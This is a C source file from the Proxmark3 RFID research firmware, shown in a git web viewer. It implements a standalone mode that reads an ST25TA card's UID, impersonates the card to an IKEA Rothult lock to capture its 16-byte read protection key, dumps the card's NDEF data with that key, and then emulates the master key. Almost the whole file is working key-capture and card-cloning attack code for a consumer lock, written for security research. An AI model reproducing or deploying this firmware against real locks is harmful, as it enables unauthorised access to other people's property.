search:
summary | log | graphiclog1 | graphiclog2 | commit | commitdiff | tree | refs | edit | fork
blame | history | raw | HEAD
Merge branch 'master' of github.com:RfidResearchGroup/proxmark3
[RRG-proxmark3.git] / armsrc / Standalone / hf_tcprst.c
bloba15e4a7ebcda667ab2d896eabfbb53024d520da7
1 //-----------------------------------------------------------------------------
2 // Nick Draffen, 2020
3 //
4 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
5 // at your option, any later version. See the LICENSE.txt file for the text of
6 // the license.
7 //-----------------------------------------------------------------------------
8 // code for HF ST25TA IKEA Rothult read/sim/dump/emulation by Nick Draffen
9 //-----------------------------------------------------------------------------
10 #include "standalone.h"
11 #include "proxmark3_arm.h"
12 #include "appmain.h"
13 #include "fpgaloader.h"
14 #include "util.h"
15 #include "dbprint.h"
16 #include "ticks.h"
17 #include "string.h"
18 #include "BigBuf.h"
19 #include "iso14443a.h"
20 #include "protocols.h"
21 #include "cmd.h"
22
23 void ModInfo(void) {
24 DbpString(" HF - IKEA Rothult ST25TA, Standalone Master Key Dump/Emulation (ISO14443) - (Nick Draffen)");
25 }
26
27 /* This standalone implements four different modes: reading, simulating, dumping, & emulating.
28 *
29 * The initial mode is reading with LEDs A & D.
30 * In this mode, the Proxmark is looking for an ST25TA card like those used by the IKEA Rothult,
31 * it will act as reader, and store the UID for simulation.
32 *
33 * If the Proxmark gets an ST25TA UID, it will change to simulation mode (LEDs A & C) automatically.
34 * During this mode the Proxmark will pretend to be the IKEA Rothult ST25TA master key, upon presentation
35 * to an IKEA Rothult the Proxmark will steal the 16 byte Read Protection key used to authenticate to the card.
36 *
37 * Once it gets the key, it will switch to dump mode (LEDs C & D) automatically. During this mode the Proxmark
38 * will act as a reader once again, but now we know the Read Protection key to authenticate to the card to dump
39 * it's contents so we can achieve full emulation.
40 *
41 * Once it dumps the contents of the card, it will switch to emulation mode (LED C) automatically.
42 * During this mode the Proxmark should function as the original ST25TA IKEA Rothult Master Key
43 *
44 * Keep pressing the button down will quit the standalone cycle.
45 *
46 * LEDs:
47 * LED A & D = in reading mode
48 * LED A & C = in simulation mode, to steal Read Protection key
49 * LED C & D = in dump mode, to authenticate to card and dump NDEF content
50 * LED C = in emulation mode
51 * LED B = receiving/sending commands, activity
52 *
53 * Thanks to Salvador Mendoza for which this standalone mode is based off
54 * Thanks to iceman for his assistance on the ST25TA research
55 */
56
57 void RunMod(void) {
58 StandAloneMode();
59 DbpString(_YELLOW_(">>") "IKEA Rothult ST25TA Standalone (tcprst) Started " _YELLOW_("<<"));
60 FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
61
62 uint8_t stuid[7] = {0x00};
63
64 //For reading process
65 iso14a_card_select_t card_a_info;
66 uint8_t apdubuffer[MAX_FRAME_SIZE] = { 0x00 };
67
68 // APDUs necessary to dump NDEF
69 // ----------------------------
70 // Select NDEF Application
71 uint8_t ndef_app[13] = {0x00, 0xa4, 0x04, 0x00, 0x07, 0xd2, 0x76, 0x00, 0x00, 0x85, 0x01, 0x01, 0x00};
72 // Select NDEF File
73 uint8_t ndef_sel[7] = {0x00, 0xa4, 0x00, 0x0c, 0x02, 0x00, 0x01};
74 // Read verification without password
75 uint8_t verify[5] = {0x00, 0x20, 0x00, 0x01, 0x00};
76 // Read verification with password
77 uint8_t verify_pwd[21] = {0x00, 0x20, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
78 // Read NDEF file contents
79 uint8_t ndef_read[5] = {0x00, 0xb0, 0x00, 0x00, 0x1d};
80
81 uint8_t *apdus[5] = {ndef_app, ndef_sel, verify, verify_pwd, ndef_read};
82 uint8_t apdusLen [5] = { sizeof(ndef_app), sizeof(ndef_sel), sizeof(verify), sizeof(verify_pwd), sizeof(ndef_read)};
83
84 // NDEF file contents
85 uint8_t ndef[31] = {0x00, 0x1b, 0xd1, 0x01, 0x17, 0x54, 0x02, 0x7a, 0x68, 0xa2, 0x34, 0xcb, 0xd0, 0xe2, 0x03, 0xc7, 0x3e, 0x62, 0x0b, 0xe8, 0xc6, 0x3c, 0x85, 0x2c, 0xc5, 0x31, 0x31, 0x31, 0x32, 0x90, 0x00};
86 uint8_t ndef_len = 31;
87
88 // Did we get the read protection key from the Rothult
89 bool gotkey = false;
90 // Did we get the NDEF file contents from the card
91 bool gotndef = false;
92
93
94 //ST25TA Rothult values
95 #define SAK 0x20
96 #define ATQA0 0x42
97 #define ATQA1 0x00
98
99 // Allocate 512 bytes for the dynamic modulation, created when the reader queries for it
100 // Such a response is less time critical, so we can prepare them on the fly
101 #define DYNAMIC_RESPONSE_BUFFER_SIZE 64
102 #define DYNAMIC_MODULATION_BUFFER_SIZE 512
103
104 uint8_t flags = FLAG_7B_UID_IN_DATA; // ST25TA have 7B UID
105 uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
106
107 // to initialize the emulation
108 uint8_t tagType = 10; // 10 = ST25TA IKEA Rothult
109 tag_response_info_t *responses;
110 uint32_t cuid = 0;
111 uint32_t counters[3] = { 0x00, 0x00, 0x00 };
112 uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
113 uint8_t pages = 0;
114
115 // command buffers
116 uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 };
117 uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 };
118
119 uint8_t dynamic_response_buffer[DYNAMIC_RESPONSE_BUFFER_SIZE] = {0};
120 uint8_t dynamic_modulation_buffer[DYNAMIC_MODULATION_BUFFER_SIZE] = {0};
121
122 // handler - command responses
123 tag_response_info_t dynamic_response_info = {
124 .response = dynamic_response_buffer,
125 .response_n = 0,
126 .modulation = dynamic_modulation_buffer,
127 .modulation_n = 0
128 };
129
130 // States for standalone
131 #define STATE_READ 0
132 #define STATE_SIM 1
133 #define STATE_DUMP 2
134 #define STATE_EMUL 3
135
136 uint8_t state = STATE_READ;
137
138 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
139 DbpString("\n"_YELLOW_("!!") "Waiting for an IKEA ST25TA card...");
140
141 for (;;) {
142 WDT_HIT();
143
144 // exit from RunMod, send a usbcommand.
145 if (data_available()) break;
146
147 // Was our button held down or pressed?
148 int button_pressed = BUTTON_HELD(1000);
149
150 if (button_pressed == BUTTON_HOLD) { //Holding down the button
151 break;
152 }
153
154 SpinDelay(500);
155
156 if (state == STATE_READ) {
157 LED_D_ON();
158 LED_A_ON();
159 // Get UID of ST25TA Card to simulate
160 iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
161
162 if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
163
164 DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
165
166 if (card_a_info.sak == SAK && card_a_info.atqa[0] == ATQA0 && card_a_info.atqa[1] == ATQA1 && card_a_info.uidlen == 7) {
167 DbpString(_YELLOW_("+") "Found ST25TA with UID: ");
168 Dbhexdump(card_a_info.uidlen, card_a_info.uid, 0);
169 memcpy(stuid, card_a_info.uid, card_a_info.uidlen);
170 state = STATE_SIM;
171 } else {
172 DbpString("Found non-ST25TA card, ignoring.");
173 }
174 }
175 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
176 } else if (state == STATE_SIM) {
177 LED_C_ON();
178
179 //Simulate tag to get PWD
180
181 // free eventually allocated BigBuf memory but keep Emulator Memory
182 BigBuf_free_keep_EM();
183
184 memcpy(data, stuid, sizeof(stuid));
185
186 if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
187 BigBuf_free_keep_EM();
188 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
189 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
190 SpinDelay(500);
191 state = STATE_READ;
192 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
193 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
194 break;
195 }
196
197 // We need to listen to the high-frequency, peak-detected path.
198 iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
199
200 int len = 0; // command length
201 int retval = PM3_SUCCESS; // to check emulation status
202
203 bool odd_reply = true;
204
205 clear_trace();
206 set_tracing(true);
207
208 while (!gotkey) {
209 LED_B_OFF();
210 // Clean receive command buffer
211 if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
212 DbpString(_YELLOW_("!!") "Emulator stopped");
213 retval = PM3_EOPABORTED;
214 break;
215 }
216 tag_response_info_t *p_response = NULL;
217 LED_B_ON();
218
219 // dynamic_response_info will be in charge of responses
220 dynamic_response_info.response_n = 0;
221
222 // Checking the commands order is important and elemental
223 if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
224 odd_reply = !odd_reply;
225 if (odd_reply)
226 p_response = &responses[RESP_INDEX_ATQA];
227 } else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
228 p_response = NULL;
229 } else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
230 p_response = &responses[RESP_INDEX_ATQA];
231 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
232 p_response = &responses[RESP_INDEX_UIDC1];
233 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
234 p_response = &responses[RESP_INDEX_UIDC2];
235 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
236 p_response = &responses[RESP_INDEX_SAKC1];
237 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
238 p_response = &responses[RESP_INDEX_SAKC2];
239 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
240 p_response = &responses[RESP_INDEX_RATS];
241 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
242 p_response = &responses[RESP_INDEX_PPS];
243 } else {
244 DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
245 Dbhexdump(len, receivedCmd, false);
246
247 if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
248 dynamic_response_info.response[0] = receivedCmd[0];
249
250 if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
251 memcpy(dynamic_response_info.response + 1, ndef, 31);
252 dynamic_response_info.response_n = 32;
253 } else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
254 dynamic_response_info.response[1] = 0x63;
255 dynamic_response_info.response[2] = 0x00;
256 dynamic_response_info.response_n = 3;
257 } else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
258 memcpy(verify_pwd + 5, receivedCmd + 6, 16);
259 DbpString("Reader sent password: ");
260 Dbhexdump(16, verify_pwd + 5, 0);
261 dynamic_response_info.response[1] = 0x90;
262 dynamic_response_info.response[2] = 0x00;
263 dynamic_response_info.response_n = 3;
264 gotkey = true;
265 state = STATE_DUMP;
266 } else {
267 dynamic_response_info.response[1] = 0x90;
268 dynamic_response_info.response[2] = 0x00;
269 dynamic_response_info.response_n = 3;
270 }
271 } else {
272 DbpString(_YELLOW_("!!") "Received unknown command!");
273 memcpy(dynamic_response_info.response, receivedCmd, len);
274 dynamic_response_info.response_n = len;
275 }
276 }
277 if (dynamic_response_info.response_n > 0) {
278 DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
279 Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
280 DbpString("----");
281
282 // Add CRC bytes, always used in ISO 14443A-4 compliant cards
283 AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
284 dynamic_response_info.response_n += 2;
285
286 if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
287 SpinDelay(500);
288 DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
289 continue;
290 }
291 p_response = &dynamic_response_info;
292 }
293
294 if (p_response != NULL) {
295 EmSendPrecompiledCmd(p_response);
296 }
297 }
298 switch_off();
299
300 set_tracing(false);
301 BigBuf_free_keep_EM();
302 reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
303
304 } else if (state == STATE_DUMP) {
305 LED_A_OFF();
306 LED_C_ON();
307 LED_D_ON();
308
309 iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
310
311 if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
312
313 DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
314
315 for (uint8_t i = 0; i < 5; i++) {
316 gotndef = false;
317 LED_B_ON();
318 uint8_t apdulen = iso14_apdu(apdus[i], (uint16_t) apdusLen[i], false, apdubuffer, NULL);
319
320 if (apdulen > 2) {
321 DbpString(_YELLOW_("[ ") "Proxmark command" _YELLOW_(" ]"));
322 Dbhexdump(apdusLen[i], apdus[i], false);
323 DbpString(_GREEN_("[ ") "Card answer" _GREEN_(" ]"));
324 Dbhexdump(apdulen - 2, apdubuffer, false);
325 DbpString("----");
326
327
328 if (i == 4) {
329 // Get NDEF Data
330 if (apdubuffer[1] == 0x1b && apdubuffer[2] == 0xd1) {
331 gotndef = true;
332 memcpy(&ndef, &apdubuffer, apdulen - 2);
333 break;
334 }
335 }
336
337 } else {
338 DbpString(_YELLOW_("!!") "Error reading the card");
339 }
340 LED_B_OFF();
341 }
342
343 if (gotndef) {
344 DbpString(_RED_("[ ") "NDEF File" _RED_(" ]"));
345 Dbhexdump(ndef_len, (uint8_t *)ndef, false);
346 DbpString("---");
347 LED_C_ON();
348 state = STATE_EMUL;
349 DbpString(_YELLOW_("[ ") "Initialized emulation mode" _YELLOW_(" ]"));
350 DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
351 }
352 }
353 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
354
355 } else if (state == STATE_EMUL) {
356 LED_D_OFF();
357 LED_C_ON();
358
359 // free eventually allocated BigBuf memory but keep Emulator Memory
360 BigBuf_free_keep_EM();
361
362 memcpy(data, stuid, sizeof(stuid));
363
364 if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
365 BigBuf_free_keep_EM();
366 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
367 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
368 SpinDelay(500);
369 state = STATE_READ;
370 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
371 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
372 break;
373 }
374
375 // We need to listen to the high-frequency, peak-detected path.
376 iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
377
378 int len = 0; // command length
379 int retval = PM3_SUCCESS; // to check emulation status
380
381 bool odd_reply = true;
382
383 clear_trace();
384 set_tracing(true);
385
386 for (;;) {
387 LED_B_OFF();
388 // Clean receive command buffer
389 if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
390 DbpString(_YELLOW_("!!") "Emulator stopped");
391 retval = PM3_EOPABORTED;
392 break;
393 }
394 tag_response_info_t *p_response = NULL;
395 LED_B_ON();
396
397 // dynamic_response_info will be in charge of responses
398 dynamic_response_info.response_n = 0;
399
400 // Checking the commands order is important and elemental
401 if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
402 odd_reply = !odd_reply;
403 if (odd_reply)
404 p_response = &responses[RESP_INDEX_ATQA];
405 } else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
406 p_response = NULL;
407 } else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
408 p_response = &responses[RESP_INDEX_ATQA];
409 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
410 p_response = &responses[RESP_INDEX_UIDC1];
411 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
412 p_response = &responses[RESP_INDEX_UIDC2];
413 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
414 p_response = &responses[RESP_INDEX_SAKC1];
415 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
416 p_response = &responses[RESP_INDEX_SAKC2];
417 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
418 p_response = &responses[RESP_INDEX_RATS];
419 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
420 p_response = &responses[RESP_INDEX_PPS];
421 } else {
422 DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
423 Dbhexdump(len, receivedCmd, false);
424
425 if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
426 dynamic_response_info.response[0] = receivedCmd[0];
427
428 if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
429 memcpy(dynamic_response_info.response + 1, ndef, 31);
430 dynamic_response_info.response_n = 32;
431 } else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
432 dynamic_response_info.response[1] = 0x63;
433 dynamic_response_info.response[2] = 0x00;
434 dynamic_response_info.response_n = 3;
435 } else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
436 memcpy(verify_pwd + 5, receivedCmd + 6, 16);
437 DbpString("Reader sent password: ");
438 Dbhexdump(16, verify_pwd + 5, 0);
439 dynamic_response_info.response[1] = 0x90;
440 dynamic_response_info.response[2] = 0x00;
441 dynamic_response_info.response_n = 3;
442 } else {
443 dynamic_response_info.response[1] = 0x90;
444 dynamic_response_info.response[2] = 0x00;
445 dynamic_response_info.response_n = 3;
446 }
447 } else {
448 DbpString(_YELLOW_("!!") "Received unknown command!");
449 memcpy(dynamic_response_info.response, receivedCmd, len);
450 dynamic_response_info.response_n = len;
451 }
452 }
453 if (dynamic_response_info.response_n > 0) {
454 DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
455 Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
456 DbpString("----");
457
458 // Add CRC bytes, always used in ISO 14443A-4 compliant cards
459 AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
460 dynamic_response_info.response_n += 2;
461
462 if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
463 SpinDelay(500);
464 DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
465 continue;
466 }
467 p_response = &dynamic_response_info;
468 }
469
470 if (p_response != NULL) {
471 EmSendPrecompiledCmd(p_response);
472 }
473 }
474 switch_off();
475
476 set_tracing(false);
477 BigBuf_free_keep_EM();
478 reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
479 }
480 }
481 DbpString(_YELLOW_("[=]") "exiting");
482 LEDsoff();
483 }
Proxmark3 - the RFID research Swiss army knife. Iceman firmware